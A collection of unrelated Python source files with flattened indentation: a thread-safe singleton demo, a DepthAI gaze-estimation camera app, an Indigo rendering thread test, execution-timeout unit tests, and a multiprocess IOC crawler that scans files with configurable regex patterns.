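        return chunk.decode('utf-8', 'ignore')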
|
main.py
|
from threading import Lock, Thread
from time import sleep
class SingletonMeta(type):
__instances: dict = {}
__lock: Lock = Lock()
def __call__(cls, *args, **kwargs):
with cls.__lock:
if cls not in cls.__instances:
sleep(2)
instance = super().__call__(*args, **kwargs)
cls.__instances[cls] = instance
return cls.__instances[cls]
class Singleton(metaclass=SingletonMeta):
__value: str = None
def __init__(self, value: str):
self.__value = value
def getValue(self) -> str:
return self.__value
def test_singleton(value: str) -> None:
obj = Singleton(value)
print(f"Value : {obj.getValue()}")
if __name__ == "__main__":
thread1 = Thread(target=test_singleton, args=("Foo", ))
thread2 = Thread(target=test_singleton, args=("Bar", ))
thread1.start()
thread2.start()
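    # Joining makes the demo deterministic to observe: both threads print the
    # same value, because SingletonMeta.__call__ serializes construction under
    # the class-level lock and the loser of the race gets the cached instance.
    thread1.join()
    thread2.join()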
|
main.py
|
import argparse
import queue
import threading
import signal
from pathlib import Path
import cv2
import depthai
import numpy as np
from imutils.video import FPS
from math import cos, sin
parser = argparse.ArgumentParser()
parser.add_argument('-nd', '--no-debug', action="store_true", help="Prevent debug output")
parser.add_argument('-cam', '--camera', action="store_true", help="Use DepthAI 4K RGB camera for inference (conflicts with -vid)")
parser.add_argument('-vid', '--video', type=str, help="Path to video file to be used for inference (conflicts with -cam)")
parser.add_argument('-laz', '--lazer', action="store_true", help="Laser mode")
args = parser.parse_args()
debug = not args.no_debug
camera = not args.video
if args.camera and args.video:
raise ValueError("Incorrect command line parameters! \"-cam\" cannot be used with \"-vid\"!")
elif args.camera is False and args.video is None:
raise ValueError("Missing inference source! Either use \"-cam\" to run on DepthAI camera or \"-vid <path>\" to run on video file")
def draw_3d_axis(image, head_pose, origin, size=50):
# From https://github.com/openvinotoolkit/open_model_zoo/blob/b1ff98b64a6222cf6b5f3838dc0271422250de95/demos/gaze_estimation_demo/cpp/src/results_marker.cpp#L50
    origin_x, origin_y = origin
    yaw, pitch, roll = np.array(head_pose) * np.pi / 180
    sinY = sin(yaw)
    sinP = sin(pitch)
    sinR = sin(roll)
    cosY = cos(yaw)
    cosP = cos(pitch)
    cosR = cos(roll)
# X axis (red)
x1 = origin_x + size * (cosR * cosY + sinY * sinP * sinR)
y1 = origin_y + size * cosP * sinR
cv2.line(image, (origin_x, origin_y), (int(x1), int(y1)), (0, 0, 255), 3)
# Y axis (green)
x2 = origin_x + size * (cosR * sinY * sinP + cosY * sinR)
y2 = origin_y - size * cosP * cosR
cv2.line(image, (origin_x, origin_y), (int(x2), int(y2)), (0, 255, 0), 3)
# Z axis (blue)
x3 = origin_x + size * (sinY * cosP)
y3 = origin_y + size * sinP
cv2.line(image, (origin_x, origin_y), (int(x3), int(y3)), (255, 0, 0), 2)
return image
def frame_norm(frame, bbox):
norm_vals = np.full(len(bbox), frame.shape[0])
norm_vals[::2] = frame.shape[1]
return (np.clip(np.array(bbox), 0, 1) * norm_vals).astype(int)
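# Example (illustrative): for a 480x640 frame, frame_norm maps the normalized
# bbox [0.25, 0.5, 0.75, 1.0] to pixels [160, 240, 480, 480]: even indices
# scale by the width (shape[1]), odd indices by the height (shape[0]).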
def to_planar(arr: np.ndarray, shape: tuple) -> list:
return [val for channel in cv2.resize(arr, shape).transpose(2, 0, 1) for y_col in channel for val in y_col]
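# Note (illustrative): to_planar resizes to `shape` and flattens the HxWxC
# image into planar channel order (all of channel 0, then 1, then 2), which
# is the layout the NN input layers below are fed via setLayer().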
def to_tensor_result(packet):
return {
tensor.name: np.array(packet.getLayerFp16(tensor.name)).reshape(tensor.dims)
for tensor in packet.getRaw().tensors
}
def padded_point(point, padding, frame_shape=None):
if frame_shape is None:
return [
point[0] - padding,
point[1] - padding,
point[0] + padding,
point[1] + padding
]
else:
def norm(val, dim):
return max(0, min(val, dim))
if np.any(point - padding > frame_shape[:2]) or np.any(point + padding < 0):
print(f"Unable to create padded box for point {point} with padding {padding} and frame shape {frame_shape[:2]}")
return None
return [
norm(point[0] - padding, frame_shape[0]),
norm(point[1] - padding, frame_shape[1]),
norm(point[0] + padding, frame_shape[0]),
norm(point[1] + padding, frame_shape[1])
]
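# Example (illustrative): padded_point(np.array([10, 20]), 30, (300, 300, 3))
# clamps the box to [0, 0, 40, 50] instead of returning negative coordinates;
# without frame_shape it would return [-20, -10, 40, 50].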
def create_pipeline():
print("Creating pipeline...")
pipeline = depthai.Pipeline()
pipeline.setOpenVINOVersion(depthai.OpenVINO.VERSION_2020_1)
if camera:
print("Creating Color Camera...")
cam = pipeline.createColorCamera()
cam.setPreviewSize(300, 300)
cam.setResolution(depthai.ColorCameraProperties.SensorResolution.THE_1080_P)
cam.setInterleaved(False)
cam.setBoardSocket(depthai.CameraBoardSocket.RGB)
cam_xout = pipeline.createXLinkOut()
cam_xout.setStreamName("cam_out")
cam.preview.link(cam_xout.input)
# NeuralNetwork
print("Creating Face Detection Neural Network...")
face_nn = pipeline.createNeuralNetwork()
face_nn.setBlobPath(str(Path("models/face-detection-retail-0004/face-detection-retail-0004_openvino_2020.1_4shave.blob").resolve().absolute()))
if camera:
cam.preview.link(face_nn.input)
else:
face_in = pipeline.createXLinkIn()
face_in.setStreamName("face_in")
face_in.out.link(face_nn.input)
face_nn_xout = pipeline.createXLinkOut()
face_nn_xout.setStreamName("face_nn")
face_nn.out.link(face_nn_xout.input)
# NeuralNetwork
print("Creating Landmarks Detection Neural Network...")
land_nn = pipeline.createNeuralNetwork()
land_nn.setBlobPath(
str(Path("models/landmarks-regression-retail-0009/landmarks-regression-retail-0009_openvino_2020.1_4shave.blob").resolve().absolute())
)
land_nn_xin = pipeline.createXLinkIn()
land_nn_xin.setStreamName("landmark_in")
land_nn_xin.out.link(land_nn.input)
land_nn_xout = pipeline.createXLinkOut()
land_nn_xout.setStreamName("landmark_nn")
land_nn.out.link(land_nn_xout.input)
# NeuralNetwork
print("Creating Head Pose Neural Network...")
pose_nn = pipeline.createNeuralNetwork()
pose_nn.setBlobPath(
str(Path("models/head-pose-estimation-adas-0001/head-pose-estimation-adas-0001_openvino_2020.1_4shave.blob").resolve().absolute())
)
pose_nn_xin = pipeline.createXLinkIn()
pose_nn_xin.setStreamName("pose_in")
pose_nn_xin.out.link(pose_nn.input)
pose_nn_xout = pipeline.createXLinkOut()
pose_nn_xout.setStreamName("pose_nn")
pose_nn.out.link(pose_nn_xout.input)
# NeuralNetwork
print("Creating Gaze Estimation Neural Network...")
gaze_nn = pipeline.createNeuralNetwork()
gaze_nn.setBlobPath(
str(Path("models/gaze-estimation-adas-0002/gaze-estimation-adas-0002_openvino_2020.1_4shave.blob").resolve().absolute())
)
gaze_nn_xin = pipeline.createXLinkIn()
gaze_nn_xin.setStreamName("gaze_in")
gaze_nn_xin.out.link(gaze_nn.input)
gaze_nn_xout = pipeline.createXLinkOut()
gaze_nn_xout.setStreamName("gaze_nn")
gaze_nn.out.link(gaze_nn_xout.input)
return pipeline
class Main:
def __init__(self, device):
self.device = device
print("Starting pipeline...")
self.device.startPipeline()
if camera:
self.cam_out = self.device.getOutputQueue("cam_out")
else:
self.face_in = self.device.getInputQueue("face_in")
if not camera:
self.cap = cv2.VideoCapture(str(Path(args.video).resolve().absolute()))
self.frame = None
self.face_box_q = queue.Queue()
self.bboxes = []
self.left_bbox = None
self.right_bbox = None
self.nose = None
self.pose = None
self.gaze = None
self.running = True
self.fps = FPS()
self.fps.start()
def face_thread(self):
face_nn = self.device.getOutputQueue("face_nn")
landmark_in = self.device.getInputQueue("landmark_in")
pose_in = self.device.getInputQueue("pose_in")
while self.running:
if self.frame is None:
continue
try:
bboxes = np.array(face_nn.get().getFirstLayerFp16())
except RuntimeError as ex:
continue
bboxes = bboxes.reshape((bboxes.size // 7, 7))
self.bboxes = bboxes[bboxes[:, 2] > 0.7][:, 3:7]
for raw_bbox in self.bboxes:
bbox = frame_norm(self.frame, raw_bbox)
det_frame = self.frame[bbox[1]:bbox[3], bbox[0]:bbox[2]]
land_data = depthai.NNData()
land_data.setLayer("0", to_planar(det_frame, (48, 48)))
landmark_in.send(land_data)
pose_data = depthai.NNData()
pose_data.setLayer("data", to_planar(det_frame, (60, 60)))
pose_in.send(pose_data)
self.face_box_q.put(bbox)
def land_pose_thread(self):
landmark_nn = self.device.getOutputQueue(name="landmark_nn", maxSize=1, blocking=False)
pose_nn = self.device.getOutputQueue(name="pose_nn", maxSize=1, blocking=False)
gaze_in = self.device.getInputQueue("gaze_in")
while self.running:
try:
land_in = landmark_nn.get().getFirstLayerFp16()
except RuntimeError as ex:
continue
try:
face_bbox = self.face_box_q.get(block=True, timeout=100)
except queue.Empty:
continue
self.face_box_q.task_done()
left = face_bbox[0]
top = face_bbox[1]
face_frame = self.frame[face_bbox[1]:face_bbox[3], face_bbox[0]:face_bbox[2]]
land_data = frame_norm(face_frame, land_in)
land_data[::2] += left
land_data[1::2] += top
left_bbox = padded_point(land_data[:2], padding=30, frame_shape=self.frame.shape)
if left_bbox is None:
print("Point for left eye is corrupted, skipping nn result...")
continue
self.left_bbox = left_bbox
right_bbox = padded_point(land_data[2:4], padding=30, frame_shape=self.frame.shape)
if right_bbox is None:
print("Point for right eye is corrupted, skipping nn result...")
continue
self.right_bbox = right_bbox
self.nose = land_data[4:6]
left_img = self.frame[self.left_bbox[1]:self.left_bbox[3], self.left_bbox[0]:self.left_bbox[2]]
right_img = self.frame[self.right_bbox[1]:self.right_bbox[3], self.right_bbox[0]:self.right_bbox[2]]
try:
# The output of pose_nn is in YPR format, which is the required sequence input for pose in gaze
# https://docs.openvinotoolkit.org/2020.1/_models_intel_head_pose_estimation_adas_0001_description_head_pose_estimation_adas_0001.html
# https://docs.openvinotoolkit.org/latest/omz_models_model_gaze_estimation_adas_0002.html
# ... three head pose angles – (yaw, pitch, and roll) ...
values = to_tensor_result(pose_nn.get())
self.pose = [
values['angle_y_fc'][0][0],
values['angle_p_fc'][0][0],
values['angle_r_fc'][0][0]
]
except RuntimeError as ex:
continue
gaze_data = depthai.NNData()
gaze_data.setLayer("left_eye_image", to_planar(left_img, (60, 60)))
gaze_data.setLayer("right_eye_image", to_planar(right_img, (60, 60)))
gaze_data.setLayer("head_pose_angles", self.pose)
gaze_in.send(gaze_data)
def gaze_thread(self):
gaze_nn = self.device.getOutputQueue("gaze_nn")
while self.running:
try:
self.gaze = np.array(gaze_nn.get().getFirstLayerFp16())
except RuntimeError as ex:
continue
def should_run(self):
if self.running:
return True if camera else self.cap.isOpened()
else:
return False
def get_frame(self, retries=0):
if camera:
return True, np.array(self.cam_out.get().getData()).reshape((3, 300, 300)).transpose(1, 2, 0).astype(np.uint8)
else:
read_correctly, new_frame = self.cap.read()
if not read_correctly or new_frame is None:
if retries < 5:
return self.get_frame(retries+1)
else:
print("Source closed, terminating...")
return False, None
else:
return read_correctly, new_frame
def run(self):
self.threads = [
threading.Thread(target=self.face_thread),
threading.Thread(target=self.land_pose_thread),
threading.Thread(target=self.gaze_thread)
]
for thread in self.threads:
thread.start()
while self.should_run():
try:
read_correctly, new_frame = self.get_frame()
except RuntimeError:
continue
if not read_correctly:
break
self.fps.update()
self.frame = new_frame
self.debug_frame = self.frame.copy()
if not camera:
nn_data = depthai.NNData()
nn_data.setLayer("data", to_planar(self.frame, (300, 300)))
self.face_in.send(nn_data)
if debug: # face
if self.gaze is not None and self.left_bbox is not None and self.right_bbox is not None:
re_x = (self.right_bbox[0] + self.right_bbox[2]) // 2
re_y = (self.right_bbox[1] + self.right_bbox[3]) // 2
le_x = (self.left_bbox[0] + self.left_bbox[2]) // 2
le_y = (self.left_bbox[1] + self.left_bbox[3]) // 2
x, y = (self.gaze * 100).astype(int)[:2]
if args.lazer:
beam_img = np.zeros(self.debug_frame.shape, np.uint8)
for t in range(10)[::-2]:
cv2.line(beam_img, (re_x, re_y), ((re_x + x*100), (re_y - y*100)), (0, 0, 255-t*10), t*2)
cv2.line(beam_img, (le_x, le_y), ((le_x + x*100), (le_y - y*100)), (0, 0, 255-t*10), t*2)
self.debug_frame |= beam_img
else:
cv2.arrowedLine(self.debug_frame, (le_x, le_y), (le_x + x, le_y - y), (255, 0, 255), 3)
cv2.arrowedLine(self.debug_frame, (re_x, re_y), (re_x + x, re_y - y), (255, 0, 255), 3)
if not args.lazer:
for raw_bbox in self.bboxes:
bbox = frame_norm(self.frame, raw_bbox)
cv2.rectangle(self.debug_frame, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (10, 245, 10), 2)
if self.nose is not None:
cv2.circle(self.debug_frame, (self.nose[0], self.nose[1]), 2, (0, 255, 0), thickness=5, lineType=8, shift=0)
if self.left_bbox is not None:
cv2.rectangle(self.debug_frame, (self.left_bbox[0], self.left_bbox[1]), (self.left_bbox[2], self.left_bbox[3]), (245, 10, 10), 2)
if self.right_bbox is not None:
cv2.rectangle(self.debug_frame, (self.right_bbox[0], self.right_bbox[1]), (self.right_bbox[2], self.right_bbox[3]), (245, 10, 10), 2)
if self.pose is not None and self.nose is not None:
draw_3d_axis(self.debug_frame, self.pose, self.nose)
if camera:
cv2.imshow("Camera view", self.debug_frame)
else:
aspect_ratio = self.frame.shape[1] / self.frame.shape[0]
cv2.imshow("Video view", cv2.resize(self.debug_frame, (int(900), int(900 / aspect_ratio))))
if cv2.waitKey(1) == ord('q'):
cv2.destroyAllWindows()
break
self.fps.stop()
print("FPS: {:.2f}".format(self.fps.fps()))
if not camera:
self.cap.release()
cv2.destroyAllWindows()
for i in range(1, 5): # https://stackoverflow.com/a/25794701/5494277
cv2.waitKey(1)
self.running = False
with depthai.Device(create_pipeline()) as device:
app = Main(device)
# Register a graceful CTRL+C shutdown
def signal_handler(sig, frame):
app.running = False
signal.signal(signal.SIGINT, signal_handler)
app.run()
for thread in app.threads:
thread.join()
|
threads.py
|
import errno
import sys
from difflib import unified_diff
from threading import Thread
sys.path.append("../../common")
from env_indigo import *
ext = "svg"
thread_count = 100
a = {}
if not os.path.exists(joinPathPy("out/threads", __file__)):
try:
os.makedirs(joinPathPy("out/threads", __file__))
except OSError as e:
if e.errno != errno.EEXIST:
raise
def threadFunction(i):
indigo = Indigo()
renderer = IndigoRenderer(indigo)
mol = indigo.loadMolecule("C")
indigo.setOption("render-output-format", ext)
renderer.renderToFile(
mol, joinPathPy("out/threads/thread_%s.%s" % (i, ext), __file__)
)
with open(
joinPathPy("out/threads/thread_%s.%s" % (i, ext), __file__), "r"
) as f:
a[i] = f.read()
if isIronPython():
renderer.Dispose()
indigo.Dispose()
def runThreads():
threads_list = []
for i in range(thread_count):
t = Thread(target=threadFunction, args=(i,))
t.start()
threads_list.append(t)
for t in threads_list:
t.join()
for i in range(1, thread_count):
if a[i] != a[i - 1]:
            # check the number of lines because SVGs get different ids across iterations with the same meaning:
# -<g id="surface45">
# +<g id="surface13">
if len(a[i].split("\n")) != len(a[i - 1].split("\n")):
result = unified_diff(a[i].splitlines(), a[i - 1].splitlines())
print("\n".join(result))
runThreads()
|
test_exec_timeout.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 Valory AG
# Copyright 2018-2021 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests for the helpers.exec_timout."""
import os
import time
import unittest
from functools import partial
from threading import Thread
from unittest.case import TestCase
import pytest
from aea.helpers.exec_timeout import (
BaseExecTimeout,
ExecTimeoutSigAlarm,
ExecTimeoutThreadGuard,
TimeoutException,
)
from tests.common.utils import timeit_context
from tests.conftest import MAX_FLAKY_RERUNS
if os.name == "nt":
pytest.skip("signal.settimer non available on Windows.", allow_module_level=True)
class BaseTestExecTimeout(TestCase):
"""Base test case for code execution timeout."""
EXEC_TIMEOUT_CLASS = BaseExecTimeout
@classmethod
def setUpClass(cls):
"""Set up."""
if cls is BaseTestExecTimeout:
raise unittest.SkipTest("Skip BaseTest tests, it's a base class")
def test_cancel_by_timeout(self):
"""Test function interrupted by timeout."""
slow_function_time = 0.4
timeout = 0.1
assert timeout < slow_function_time
with timeit_context() as timeit_result:
with pytest.raises(TimeoutException):
with self.EXEC_TIMEOUT_CLASS(timeout) as exec_timeout:
self.slow_function(slow_function_time)
assert exec_timeout.is_cancelled_by_timeout()
assert (
timeit_result.time_passed >= timeout
and timeit_result.time_passed < slow_function_time
)
def test_limit_is_0_do_not_limit_execution(self):
"""Test function will not be interrupted cause timeout is 0 or None."""
slow_function_time = 0.1
timeout = 0
assert timeout < slow_function_time
with timeit_context() as timeit_result:
with self.EXEC_TIMEOUT_CLASS(timeout) as exec_timeout:
self.slow_function(slow_function_time)
assert not exec_timeout.is_cancelled_by_timeout()
assert timeit_result.time_passed >= slow_function_time
def test_timeout_bigger_than_execution_time(self):
"""Test function interrupted by timeout."""
slow_function_time = 0.1
timeout = 1
assert timeout > slow_function_time
with timeit_context() as timeit_result:
with self.EXEC_TIMEOUT_CLASS(timeout) as exec_timeout:
self.slow_function(slow_function_time)
assert not exec_timeout.is_cancelled_by_timeout()
assert (
timeit_result.time_passed <= timeout
and timeit_result.time_passed >= slow_function_time
)
@classmethod
def slow_function(cls, sleep):
"""Sleep some time to test timeout applied."""
time.sleep(sleep)
class TestSigAlarm(BaseTestExecTimeout):
"""Test code execution timeout using unix signals."""
EXEC_TIMEOUT_CLASS = ExecTimeoutSigAlarm
class TestThreadGuard(BaseTestExecTimeout):
"""Test code execution timeout using. thread set execption."""
EXEC_TIMEOUT_CLASS = ExecTimeoutThreadGuard
def setUp(self):
"""Set up."""
self.EXEC_TIMEOUT_CLASS.start()
def tearDown(self):
"""Tear down."""
self.EXEC_TIMEOUT_CLASS.stop(force=True)
@classmethod
def slow_function(cls, sleep):
"""Sleep in cycle to be perfect interrupted."""
fractions = 10
for _ in range(fractions):
time.sleep(sleep / fractions)
@pytest.mark.flaky(reruns=MAX_FLAKY_RERUNS)
def test_execution_limit_in_threads(self):
"""Test two threads with different timeouts same time."""
# pydocstyle: ignore # conflict with black # noqa: E800
def make_test_function(slow_function_time, timeout):
assert timeout < slow_function_time
with timeit_context() as timeit_result:
with pytest.raises(TimeoutException):
with self.EXEC_TIMEOUT_CLASS(timeout) as exec_limit:
self.slow_function(slow_function_time)
assert exec_limit.is_cancelled_by_timeout()
assert (
timeit_result.time_passed >= timeout
and timeit_result.time_passed < slow_function_time
)
t1_sleep, t1_timeout = 1, 0.6
t2_sleep, t2_timeout = 0.45, 0.1
t1 = Thread(target=partial(make_test_function, t1_sleep, t1_timeout))
t2 = Thread(target=partial(make_test_function, t2_sleep, t2_timeout))
with timeit_context() as time_t1:
t1.start()
with timeit_context() as time_t2:
t2.start()
t2.join()
t1.join()
assert t2_timeout <= time_t2.time_passed <= t2_sleep
assert t1_timeout <= time_t1.time_passed < t1_sleep
def test_supervisor_not_started():
"""Test that TestThreadGuard supervisor thread not started."""
timeout = 0.1
sleep_time = 0.5
exec_limiter = ExecTimeoutThreadGuard(timeout)
with exec_limiter as exec_limit:
assert not exec_limiter._future_guard_task
TestThreadGuard.slow_function(sleep_time)
assert not exec_limit.is_cancelled_by_timeout()
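# Note (illustrative): without ExecTimeoutThreadGuard.start() there is no
# supervisor thread (_future_guard_task stays falsy), so the context manager
# is a no-op and the slow function runs to completion, which is exactly what
# the assertions above verify.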
|
crawler.py
|
#!/usr/bin/python3
## --------------------------------------------------------------------------------------------------------------------
import logging # for log
import os # for file handling, exit
import sys # for exit
import multiprocessing # for multiprocessing purpose
import re # for pattern
from configparser import ConfigParser, ExtendedInterpolation # for loading config files
from .crawlererr import CrawlerConfigError, CrawlerError, CrawlerFileReadError, CrawlerProcessError, CrawlerMatchError # ioc crawler error handling
from .crawlerdata import CrawlerVo, CrawlerWhitelistData # data objects
## --------------------------------------------------------------------------------------------------------------------
LOG = logging.getLogger('IocCrawlerLog')
## --------------------------------------------------------------------------------------------------------------------
## Class for ioc crawling
class Crawler():
## constructor
# Init variables and read all files
def __init__(self, pathSrc:str, threadsSrc:int, patternSrc:str, printToStdoutSrc:bool,
resultColumnFormatSrc:list, sectionsSrc:list, matchHighlightingSrc:bool,
matchSizeSrc:int, whitelistSrc:str=None, beforeSrc:int=0, afterSrc:int=0) -> None:
try:
# init
self.blockQueue = multiprocessing.Queue()
self.sharedQueue = multiprocessing.Queue()
self.processCount = threadsSrc
self.processedFileCount = multiprocessing.Value('i', 0)
self.whiteListedMatches = multiprocessing.Value('i', 0)
self.overMaxMatchSize = multiprocessing.Value('i', 0)
self.rootFilePath = ""
self.rootRelPath = ""
self.printToStdOut = printToStdoutSrc
self.resultList = []
self.whitlist = None
self.whitlistedFiles = 0
self.result_columns = resultColumnFormatSrc
self.sectionsForResult = sectionsSrc
self.matchHighligting = matchHighlightingSrc
self.before = beforeSrc
self.after = afterSrc
self.matchSize = matchSizeSrc
self._printCrawlerMessage('[+] Init Crawler')
LOG.debug("Init Crawler")
# check path of source dir
if not os.path.exists(pathSrc):
raise CrawlerFileReadError("File not found.", os.path.basename(pathSrc))
if not os.path.isabs(pathSrc):
self.rootFilePath = os.path.abspath(pathSrc)
else:
self.rootFilePath = pathSrc
# set relative path
if self.rootFilePath != pathSrc:
self.rootRelPath = os.path.relpath(pathSrc)
else:
self.rootRelPath = pathSrc
# Check match size
if self.matchSize < 5:
raise CrawlerConfigError("Match size have to be greater then 5")
# load pattern
self.patterns = self._loadPattern(patternSrc)
LOG.debug('Pattern loaded: ' + str(len(self.patterns)))
# load whitelist
if whitelistSrc:
self.whitlist = self._loadWhitelist(whitelistSrc)
LOG.debug('Whitelist loaded')
else:
LOG.debug('No whitelist')
# check files
self._printCrawlerMessage('[+] Checking files')
self.fileList = self._readFiles(self.rootFilePath, self.rootRelPath)
self.fileListSize = len(self.fileList)
self._printCrawlerMessage(" |- %d files found, %d whitelisted." %(self.fileListSize, self.whitlistedFiles))
LOG.debug("%d files found for processing" %(self.fileListSize))
except CrawlerFileReadError as re:
raise re
except CrawlerConfigError as ce:
raise ce
except Exception as e:
raise CrawlerError("Initialisation error. " + getattr(e, 'message', repr(e)))
# end init
## Loads pattern from config or personal file
    # - patterns are only loaded if their sections were selected by the user
# @param patternFileSrc - all search pattern
# @return - a patterns dict
def _loadPattern(self, patternFileSrc) -> list:
try:
LOG.debug('Load patterns')
patternCfg = ConfigParser(interpolation=None)
patternCfg.read(patternFileSrc)
patterns = {}
for ioc_type in patternCfg.sections():
if ioc_type.lower() in self.sectionsForResult:
for option in patternCfg.options(ioc_type):
ioc_pattern = patternCfg[ioc_type][option]
if ioc_pattern:
if ioc_type not in patterns:
patterns[ioc_type] = [re.compile(b'%b' % bytearray(ioc_pattern.encode('utf-8')))]
else:
patterns[ioc_type].append(re.compile(b'%b' % bytearray(ioc_pattern.encode('utf-8'))))
# end if
# end if
# end for
# end for
return patterns
except Exception as e:
raise CrawlerConfigError(getattr(e, 'message', repr(e)))
# end _loadPattern
## Loads whitelist from config or personal file
# @param whitelistFileSrc
# @return - a patterns dict
def _loadWhitelist(self, whitelistFileSrc) -> CrawlerWhitelistData:
try:
LOG.debug('Load whitelist')
whitelistCfg = ConfigParser(interpolation=ExtendedInterpolation())
whitelistCfg.read(whitelistFileSrc)
whitelistObj = CrawlerWhitelistData()
for wh_section in whitelistCfg.sections():
for option in whitelistCfg.options(wh_section):
whitelistObj.addWhiteListItem(wh_section, option, whitelistCfg[wh_section][option].strip().split('\n'))
# end for
# end for
return whitelistObj
except Exception as e:
raise CrawlerConfigError(getattr(e, 'message', repr(e)))
# end _loadWhitelist
## Reads all files from the directory
    # If the file/directory is whitelisted, it will not be added to the file list
# @param dirSrc root source
# @return file list to read
def _readFiles(self, rootFilePathSrc, relPathSrc) -> list:
try:
filesList = []
filename = ""
if os.path.isfile(rootFilePathSrc):
filesList.append(rootFilePathSrc)
else:
for root, dirs, files in os.walk(rootFilePathSrc):
for filename in files:
filePathStr = os.path.join(root, filename)
if self.whitlist:
# get the index of the relative beginning of the file to check whitelisting
idx = filePathStr.index(relPathSrc) + len(relPathSrc)
if filePathStr[idx:] in self.whitlist:
LOG.debug("%s whitelisted." %(filePathStr[idx:]))
self.whitlistedFiles +=1
else:
filesList.append(filePathStr)
else:
filesList.append(filePathStr)
# end for
# end for
# end rootFilePath is directory
except IOError as io:
raise CrawlerFileReadError(getattr(io, 'message', repr(io)), filename)
except Exception as e:
raise CrawlerError(getattr(e, 'message', repr(e)))
return filesList
# end _readFiles
    ## Returns a summary of all found ioc types and the count of matches
# - checks the white listed file count
# - checks the white listed matches count
# @return List of strings
def getResultSummary(self) -> dict:
summaryDict = {}
if self.whitlist:
if self.whitlistedFiles > 0:
summaryDict["Whitelisted files"] = self.whitlistedFiles
if self.whiteListedMatches.value > 0:
summaryDict["Whitelisted matches"] = self.whiteListedMatches.value
if self.overMaxMatchSize.value > 0:
summaryDict["Matchs above the max match size"] = self.whiteListedMatches.value
# end if self.whitlist
for item in self.resultList:
for key in item.mCount.keys():
if key not in summaryDict:
summaryDict[key] = item.mCount[key]
else:
summaryDict[key] = summaryDict[key] + item.mCount[key]
# end for
return summaryDict
# end def getResultSummary
## Process files from block
# - do pattern search
# - check for whitelist etc
# @param blockFiles - the files to process
def _processBlock(self, blockFiles, shared_list) -> None:
try:
for file in blockFiles:
try:
# create value object for the results - save only the relative path to the results
cvo = CrawlerVo(file[len(self.rootRelPath):])
with open(file, 'rb') as f:
LOG.debug("Processing %s" %(file))
fileSize = os.path.getsize(file)
bufSize = 32384 # read buffer
overlap = 1024 # overlap reading size
filePos = 0 # current position in file
                        # if the file is smaller than the buffer, skip overlap reading
if fileSize < bufSize:
bufSize = fileSize
overlap = 0
# read the file in blocks
while filePos < fileSize:
# log status
if filePos > 0:
if (filePos/10) % 100 == 0:
LOG.debug("Hanging on %s; read %d/%d bytes" %(file, filePos, fileSize))
buffer = None
buffer = f.read(bufSize+overlap)
for ioc_type in self.patterns:
for pattern in self.patterns[ioc_type]:
matchDict = {}
searchRes = re.finditer(pattern, buffer)
for item in searchRes:
if item.start() < bufSize:
try:
matchString = item.group(0).decode("utf-8")
# Check match size
if len(matchString) > self.matchSize:
raise CrawlerMatchError("Match for %s is greater then %d." %(item, self.matchSize))
before = ""
after = ""
if self.before > 0:
raise CrawlerError("self.before not implemented")
elif self.after > 0:
raise CrawlerError("self.after not implemented")
#after = buffer[item.start() + len(matchString): item.start() + len(matchString) + self.after].decode("utf-8")
#printDict = {"file" : file, "ioc" : ioc_type,
# "match": before + matchString + after, "offset": str(filePos + item.start())}
# hint: save only relative path
printDict = {"file" : file[len(self.rootRelPath):], "ioc" : ioc_type, "match": matchString, "offset": str(filePos + item.start())}
isWhiteListed = False
if self.whitlist:
if matchString in self.whitlist:
isWhiteListed = True
with self.processedFileCount.get_lock():
self.whiteListedMatches.value +=1
if not isWhiteListed:
if self.printToStdOut:
self._printCrawlerResult(printDict)
                                                    if before + matchString + after not in matchDict:
matchDict[before + matchString + after] = [str(filePos + item.start())]
else:
matchDict[before + matchString + after].extend([str(filePos + item.start())])
# end try
except UnicodeDecodeError as ude:
LOG.debug("Decoding error while Processing %s" %(item))
except CrawlerMatchError as me:
with self.processedFileCount.get_lock():
self.overMaxMatchSize.value +=1
LOG.debug(me)
# end if item.start() < pos + bufSize
# end for item in searchRes
# add match
if matchDict:
cvo.addMatchResults(ioc_type, matchDict)
# end for pattern
# end for ioc_type
# set new offset
if f.tell() < fileSize:
filePos = f.seek(f.tell() - overlap)
else:
filePos = f.tell()
# end while filePos < fileSize:
# end with file
# add crawler file value object to the result list
shared_list.append(cvo)
except IOError as ioe:
LOG.info("[!] " + getattr(ioe, 'message', repr(ioe)))
# end for
# set lock for the process counter and save the new status
with self.processedFileCount.get_lock():
self.processedFileCount.value += len(blockFiles)
# log processing status for the user
self._printCrawlerMessage(" |- Processed files: %d / %d [%s %%]" % (self.processedFileCount.value,
self.fileListSize,
self._getProcessStatus()))
except Exception as e:
raise CrawlerProcessError(getattr(e, 'message', repr(e)))
# end processBlock
## Main function for processing
    # - uses the nested function "_processQueue" to pull tasks from the queue
def do(self) -> None:
self._printCrawlerMessage("[+] Start processing files")
manager = multiprocessing.Manager()
shared_list = manager.list()
processList = []
## Get Blocks from Queue and process them until queue is empty
def _processQueue():
while not self.blockQueue.empty():
# process block
LOG.debug("Get new block from queue")
blockFiles = self.blockQueue.get()
self._processBlock(blockFiles, shared_list)
# end processBlock
try:
# check if there is anything to do
if self.fileListSize < 1:
raise CrawlerFileReadError("No files to read.")
# Calc block size
blockSize = 0
if self.fileListSize < 10:
blockSize = self.fileListSize
self.processCount = 1
elif self.fileListSize < 100:
blockSize = round(self.fileListSize / 4)
elif self.fileListSize < 1000:
blockSize = round(self.fileListSize / 8)
elif self.fileListSize < 10000:
blockSize = round(self.fileListSize / 10)
fileCounter = 0
blockList = []
for item in self.fileList:
blockList.append(item)
fileCounter += 1
if fileCounter >= blockSize:
self.blockQueue.put(blockList)
del blockList
blockList = []
fileCounter = 0
# end if
# add the remaining files to the queue
if blockList:
self.blockQueue.put(blockList)
# create sub processes and start them
LOG.debug("Using %d processes for processing." %(self.processCount))
for process in range(1,self.processCount+1):
LOG.debug("Create Process")
process = multiprocessing.Process(target=_processQueue)
process.daemon = True
process.start()
processList.append(process)
# end for
for process in processList:
process.join()
# do post processing
self.resultList.extend(shared_list)
self._printCrawlerMessage("[+] Finished processing.")
except Exception as e:
raise CrawlerError("Error in do function. " + getattr(e, 'message', repr(e)))
except KeyboardInterrupt:
